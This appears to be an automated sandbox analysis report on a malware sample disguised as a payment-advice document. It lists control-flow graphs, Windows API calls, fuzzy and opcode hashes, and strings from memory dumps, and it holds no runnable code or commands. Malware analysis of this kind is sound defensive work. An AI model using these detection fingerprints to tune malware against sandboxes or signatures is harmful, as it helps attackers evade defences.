                                                                                                                                            • Opcode ID: 4858ff81a5e8e92948ec25b27c596cc6a33fbb24a130fab9a9a75bde9eb50370
                                                                                                                                            • Instruction ID: afd36da5cb6ba29d5d8b9d0f3a7417745f1f9554a01c4faef535344b66660d84
                                                                                                                                            • Opcode Fuzzy Hash: 4858ff81a5e8e92948ec25b27c596cc6a33fbb24a130fab9a9a75bde9eb50370
                                                                                                                                            • Instruction Fuzzy Hash: 2F90023160550402D500755849147071009D7D1201F65C455A5424668EC795CA6566A2

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 4145c0-4145cb 1 4145bb-4145bc 0->1 2 4145cd-4145d2 0->2 3 4145a4 2->3 4 4145d4-4145e6 2->4 7 414616-414628 call 42ef13 3->7 8 4145a6-4145ac 3->8 5 4145e8-4145f0 4->5 6 41462a-414633 call 42f923 4->6 9 414612 5->9 10 4145f2-4145f4 5->10 17 414634 6->17 7->6 15 414614 9->15 16 414669-41466c 9->16 13 414601-414607 10->13 14 4145f6 10->14 14->17 18 4145f8-414600 14->18 15->7 19 414635-414666 call 417dc3 call 4048b3 call 425503 16->19 20 41466d-41467d 16->20 17->5 18->13 19->16 21 41469d-4146a3 20->21 22 41467f-41468e PostThreadMessageW 20->22 22->21 27 414690-41469a 22->27 27->21
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559
                                                                                                                                            • Opcode ID: 8db3aa977ed821cc02c9b9755325aba191a82c2463bed7ddff3301cc46a87eeb
                                                                                                                                            • Instruction ID: a38a19859597c4e6e1d47c24a67c1ad7e9950002486cad7920d3763165c054a8
                                                                                                                                            • Opcode Fuzzy Hash: 8db3aa977ed821cc02c9b9755325aba191a82c2463bed7ddff3301cc46a87eeb
                                                                                                                                            • Instruction Fuzzy Hash: 62318E7290114C7FDB10DAA4AC81DEF7B6CAB9235CF04402FF904A7241E12D8E4687EA

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 31 414595-4145a4 33 414616-414633 call 42ef13 call 42f923 31->33 34 4145a6-4145ac 31->34 38 414634 33->38 40 414612 38->40 41 4145f2-4145f4 38->41 44 414614 40->44 45 414669-41466c 40->45 42 414601-414607 41->42 43 4145f6 41->43 43->38 46 4145f8-414600 43->46 44->33 47 414635-414666 call 417dc3 call 4048b3 call 425503 45->47 48 41466d-41467d 45->48 46->42 47->45 49 41469d-4146a3 48->49 50 41467f-41468e PostThreadMessageW 48->50 50->49 55 414690-41469a 50->55 55->49
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559
                                                                                                                                            • Opcode ID: 3381644c3cf99aabc76e807d659441e64835fb64e4ffc46ed3a73b671cb8bf04
                                                                                                                                            • Instruction ID: 84db4ab4c16e3a995e9550d55e013f9a162ef2d0504a0c2f815f3073e6ddb3a0
                                                                                                                                            • Opcode Fuzzy Hash: 3381644c3cf99aabc76e807d659441e64835fb64e4ffc46ed3a73b671cb8bf04
                                                                                                                                            • Instruction Fuzzy Hash: DA112772D0115C7AEB10AAA19C82EEF7B7CDF82398F454069FA04B7242D63C4E0687B1

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 59 41460a-41460e 60 414610 59->60 61 414684-41468e PostThreadMessageW 59->61 64 414612 60->64 62 414690-41469a 61->62 63 41469d-4146a3 61->63 62->63 65 414614-414633 call 42ef13 call 42f923 64->65 66 414669-41466c 64->66 78 414634 65->78 67 414635-414666 call 417dc3 call 4048b3 call 425503 66->67 68 41466d-41467d 66->68 67->66 68->63 70 41467f-414683 68->70 70->61 78->64 81 4145f2-4145f4 78->81 83 414601-414607 81->83 84 4145f6 81->84 84->78 85 4145f8-414600 84->85 85->83
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559
                                                                                                                                            • Opcode ID: 8e504f57ca564d4671762f9b9801edcb6fc5564ea8acf1417db21949e0a90039
                                                                                                                                            • Instruction ID: 2f14aeb2a968f37d35cd1fc421451ae93ea76f2936ae965c16d40e7cd684983a
                                                                                                                                            • Opcode Fuzzy Hash: 8e504f57ca564d4671762f9b9801edcb6fc5564ea8acf1417db21949e0a90039
                                                                                                                                            • Instruction Fuzzy Hash: 37110672D0021C7AEB10AAE19C81DEF7B7CDF81358F41802AFA0467101D57C4E0687B5

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 86 414613-414614 87 414616-414633 call 42ef13 call 42f923 86->87 91 414634 87->91 93 414612 91->93 94 4145f2-4145f4 91->94 97 414614 93->97 98 414669-41466c 93->98 95 414601-414607 94->95 96 4145f6 94->96 96->91 99 4145f8-414600 96->99 97->87 100 414635-414646 call 417dc3 98->100 101 41466d-41467d 98->101 99->95 106 41464b-414666 call 4048b3 call 425503 100->106 102 41469d-4146a3 101->102 103 41467f-41468e PostThreadMessageW 101->103 103->102 108 414690-41469a 103->108 106->98 108->102
                                                                                                                                            APIs
                                                                                                                                            • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                            • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                            • API String ID: 1836367815-3632291559
                                                                                                                                            • Opcode ID: 75b64f5f9338c3b0d63f75708259dbdd9b7bbbbadf4148c30b6a70576e27ca1c
                                                                                                                                            • Instruction ID: b1f2822fdde1a8a37edeeec6d97a4a6f8e628c87287faab8aeed485a3d20c385
                                                                                                                                            • Opcode Fuzzy Hash: 75b64f5f9338c3b0d63f75708259dbdd9b7bbbbadf4148c30b6a70576e27ca1c
                                                                                                                                            • Instruction Fuzzy Hash: 7701A571D0011C7AEB10AAE19C81EEF7B7C9F41358F418069FA0467141D57C4E0687B5

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 300 417db6-417dbe 302 417dc1 300->302 303 417dfb-417e00 300->303 304 417dc3-417dec call 42fa53 302->304 305 417d74-417d7a 302->305 306 417e10-417e21 call 42e4f3 303->306 307 417e02-417e0d call 4302f3 303->307 317 417df2-417df6 call 430053 304->317 318 417dee-417df1 304->318 310 417d73-417d7a 305->310 311 417d7c-417d8d call 417ae3 305->311 320 417e23-417e37 LdrLoadDll 306->320 321 417e3a-417e3d 306->321 307->306 310->310 310->311 323 417db2-417db5 311->323 324 417d8f-417d93 311->324 317->303 320->321 325 417d96-417d9d 324->325 325->325 326 417d9f-417da2 325->326 326->323 327 417da4-417da6 326->327 328 417da9-417db0 327->328 328->323 328->328
                                                                                                                                            APIs
                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E35
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Load
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                            • Opcode ID: e92e2bd8e92d6cf6769027d0a7ab914c286abf308111735771e30c1c5e85870c
                                                                                                                                            • Instruction ID: 768e9a2dea899310e52eb886fb54352dee10bc69cabf07a1c405106990d73114
                                                                                                                                            • Opcode Fuzzy Hash: e92e2bd8e92d6cf6769027d0a7ab914c286abf308111735771e30c1c5e85870c
                                                                                                                                            • Instruction Fuzzy Hash: BF212775E0810E6BDB10EB54E841EFEB775AF51308F04419BE84887241F63AAA99C765

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 344 42d0c3-42d104 call 404943 call 42e003 RtlAllocateHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(?,0041EBBE,?,?,00000000,?,0041EBBE,?,?,?), ref: 0042D0FF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                            • Instruction ID: bd14d76cccbd5b5b5072585d725f183bb722e8bbb970f0ac88227b98fc761909
                                                                                                                                            • Opcode Fuzzy Hash: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                            • Instruction Fuzzy Hash: 54E092B13043147BC610EE6ADC85F9B73ACEFC9718F000419FA08A7241D775B9108BB8

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 349 42d113-42d154 call 404943 call 42e003 RtlFreeHeap
                                                                                                                                            APIs
                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,348F3D41,00000007,00000000,00000004,00000000,00417628,000000F4), ref: 0042D14F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                            • Opcode ID: fbcce9ac393ef9d6e8187d69ea3e8cd08d51942079d650599fc94455718920a1
                                                                                                                                            • Instruction ID: 5a24fe1c8667838e1b86e8c9ddda84145e04184eafb81871ef1f6178e643cdb2
                                                                                                                                            • Opcode Fuzzy Hash: fbcce9ac393ef9d6e8187d69ea3e8cd08d51942079d650599fc94455718920a1
                                                                                                                                            • Instruction Fuzzy Hash: 60E06DB23042147BD610EE5ADC45E9B77ACEFC5714F000019F908A7241D675B9118AB5

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 359 42d163-42d19c call 404943 call 42e003 ExitProcess
                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,C8E77539,?,?,C8E77539), ref: 0042D197
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                            • Opcode ID: 0784899f664b46459984781d242e4c204c322996c6f648afae983b60901c4e29
                                                                                                                                            • Instruction ID: 70ab90042a3d36bc48ece20a69110b5b6613236de1f56952ea0b987fd4a41942
                                                                                                                                            • Opcode Fuzzy Hash: 0784899f664b46459984781d242e4c204c322996c6f648afae983b60901c4e29
                                                                                                                                            • Instruction Fuzzy Hash: F6E04F716002147BC720AA6AEC41F9B775CDBC5714F00401AFA0967281D675B91187F5

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 364 16e2c0a-16e2c0f 365 16e2c1f-16e2c26 LdrInitializeThunk 364->365 366 16e2c11-16e2c18 364->366
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 4a3c80c1c4713fce1696c29eb5af3d42a5bb545e88891332291467bd21ee20d8
                                                                                                                                            • Instruction ID: 8bcf836d0625aad76be739a3fb1180edc16352bb476202951a0ac89007d399b7
                                                                                                                                            • Opcode Fuzzy Hash: 4a3c80c1c4713fce1696c29eb5af3d42a5bb545e88891332291467bd21ee20d8
                                                                                                                                            • Instruction Fuzzy Hash: 36B09B719025C5C5DE51E7644E0C7177955B7D1701F15C165D3030751F4738C1E5E275
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-2160512332
                                                                                                                                            • Opcode ID: 4c937ed613fede637d15295dbaf74a4567d4e1ae13cf1d4658f377be590ecd88
                                                                                                                                            • Instruction ID: c7e3af31a0a543fd1674625fecf11f4fcedcd09d4d427a033d4f42825ac1f72f
                                                                                                                                            • Opcode Fuzzy Hash: 4c937ed613fede637d15295dbaf74a4567d4e1ae13cf1d4658f377be590ecd88
                                                                                                                                            • Instruction Fuzzy Hash: 1192AD71608352ABE721DE28CC84B6BF7E9FB88710F04491DFA94D7252D770E846CB96
                                                                                                                                            Strings
                                                                                                                                            • Critical section address, xrefs: 01715425, 017154BC, 01715534
                                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01715543
                                                                                                                                            • undeleted critical section in freed memory, xrefs: 0171542B
                                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017154CE
                                                                                                                                            • Invalid debug info address of this critical section, xrefs: 017154B6
                                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017154E2
                                                                                                                                            • Address of the debug info found in the active list., xrefs: 017154AE, 017154FA
                                                                                                                                            • Critical section address., xrefs: 01715502
                                                                                                                                            • 8, xrefs: 017152E3
                                                                                                                                            • Critical section debug info address, xrefs: 0171541F, 0171552E
                                                                                                                                            • Thread identifier, xrefs: 0171553A
                                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0171540A, 01715496, 01715519
                                                                                                                                            • double initialized or corrupted critical section, xrefs: 01715508
                                                                                                                                            • corrupted critical section, xrefs: 017154C2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                            • API String ID: 0-2368682639
                                                                                                                                            • Opcode ID: 4b751ba68f3477475c903d81ce35201b2a7d9302677cd87c4b386491716144d2
                                                                                                                                            • Instruction ID: 087b9585c0dfed8865a53a0e6004637f6504c99eade66958fb01de3048602034
                                                                                                                                            • Opcode Fuzzy Hash: 4b751ba68f3477475c903d81ce35201b2a7d9302677cd87c4b386491716144d2
                                                                                                                                            • Instruction Fuzzy Hash: 4B81CDB1A40358AFDB24CF99CC45BAEFBBAFB49714F204259F505B7280D374A945CBA0
                                                                                                                                            Strings
                                                                                                                                            • @, xrefs: 0171259B
                                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01712498
                                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017124C0
                                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01712409
                                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01712412
                                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017122E4
                                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0171261F
                                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01712506
                                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01712602
                                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017125EB
                                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01712624
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                            • API String ID: 0-4009184096
                                                                                                                                            • Opcode ID: a0c861087bca0c91c24940affa856135ba40e84e2c0c2b74f29a9b201166dd33
                                                                                                                                            • Instruction ID: c900f571b717680e08e49523a78537a248eb975bb679d197632ce1e1fcce7c66
                                                                                                                                            • Opcode Fuzzy Hash: a0c861087bca0c91c24940affa856135ba40e84e2c0c2b74f29a9b201166dd33
                                                                                                                                            • Instruction Fuzzy Hash: 060280B1D002299BDB61DB58CC80BDAF7B8AF54704F1041DEE609A7242EB30AF85CF59
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                            • API String ID: 0-2515994595
                                                                                                                                            • Opcode ID: 64bccda52db4ae5b444f01a8c77937c7a3b0084b39aded76d291ea36c680ff47
                                                                                                                                            • Instruction ID: 510679b2b5ebb4087df6b905147daaf00c23720a14236f31ad8f7bb40ede2d7a
                                                                                                                                            • Opcode Fuzzy Hash: 64bccda52db4ae5b444f01a8c77937c7a3b0084b39aded76d291ea36c680ff47
                                                                                                                                            • Instruction Fuzzy Hash: 8E51DE715063099BC325CF68CC48BABFBE8EF98250F144A6DE999C3241E770D648CB97
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                            • API String ID: 0-1700792311
                                                                                                                                            • Opcode ID: e6a953a9aa86fa90a49a6ea5db62699ecb47e64c7fb730c062113d9660b13b55
                                                                                                                                            • Instruction ID: 42e58c992202bef9ef652b89498d97bedd562aba0a720304bd5e5bd43918e786
                                                                                                                                            • Opcode Fuzzy Hash: e6a953a9aa86fa90a49a6ea5db62699ecb47e64c7fb730c062113d9660b13b55
                                                                                                                                            • Instruction Fuzzy Hash: 2BD1CE35500685DFDB62DF68C840AAEFBF2FF4A714F18809DF8469B252C7B49986CB14
                                                                                                                                            Strings
                                                                                                                                            • VerifierDebug, xrefs: 01728CA5
                                                                                                                                            • HandleTraces, xrefs: 01728C8F
                                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01728B8F
                                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01728A3D
                                                                                                                                            • VerifierDlls, xrefs: 01728CBD
                                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01728A67
                                                                                                                                            • VerifierFlags, xrefs: 01728C50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                            • API String ID: 0-3223716464
                                                                                                                                            • Opcode ID: 0a2c8c43a8f5837aff76418807e5c07156655deedb777e8541baae847c671615
                                                                                                                                            • Instruction ID: 44804036fa030da4c47909eff0ea4d6b0b449d044ee7add97452e4343fa532cc
                                                                                                                                            • Opcode Fuzzy Hash: 0a2c8c43a8f5837aff76418807e5c07156655deedb777e8541baae847c671615
                                                                                                                                            • Instruction Fuzzy Hash: 929137B16093329FE722EF28CC80B2AF7E5EB54B24F05459DFA416B240C7719D4AC796
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                            • API String ID: 0-1109411897
                                                                                                                                            • Opcode ID: 012b9774dec4346c905b25a515e2bd2d0e40c85dba6b8e48613474f6dc5142ee
                                                                                                                                            • Instruction ID: 6caace154084b6400b427d02f5ecc41d9fac5475fd783652580e164e6a69ccdb
                                                                                                                                            • Opcode Fuzzy Hash: 012b9774dec4346c905b25a515e2bd2d0e40c85dba6b8e48613474f6dc5142ee
                                                                                                                                            • Instruction Fuzzy Hash: CCA23770A0562ACBDB65DF18CC887ADFBB5AF45304F5442E9DA0AA7390DB319E81CF41
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-792281065
                                                                                                                                            • Opcode ID: b3822bcb7675c709e8e2321b5dbb990da3cd82891bf511f172799bc884f7cd12
                                                                                                                                            • Instruction ID: 5f71167d990176864761cd77cc4775f852b64b59aba371f6f6341736b5a1768e
                                                                                                                                            • Opcode Fuzzy Hash: b3822bcb7675c709e8e2321b5dbb990da3cd82891bf511f172799bc884f7cd12
                                                                                                                                            • Instruction Fuzzy Hash: 62913971E013159BEB35DF5CDC95BAEBBA2BB40B34F10812DE5066B289D7709846CBD0
                                                                                                                                            Strings
                                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016F9A2A
                                                                                                                                            • LdrpInitShimEngine, xrefs: 016F99F4, 016F9A07, 016F9A30
                                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 016F9A01
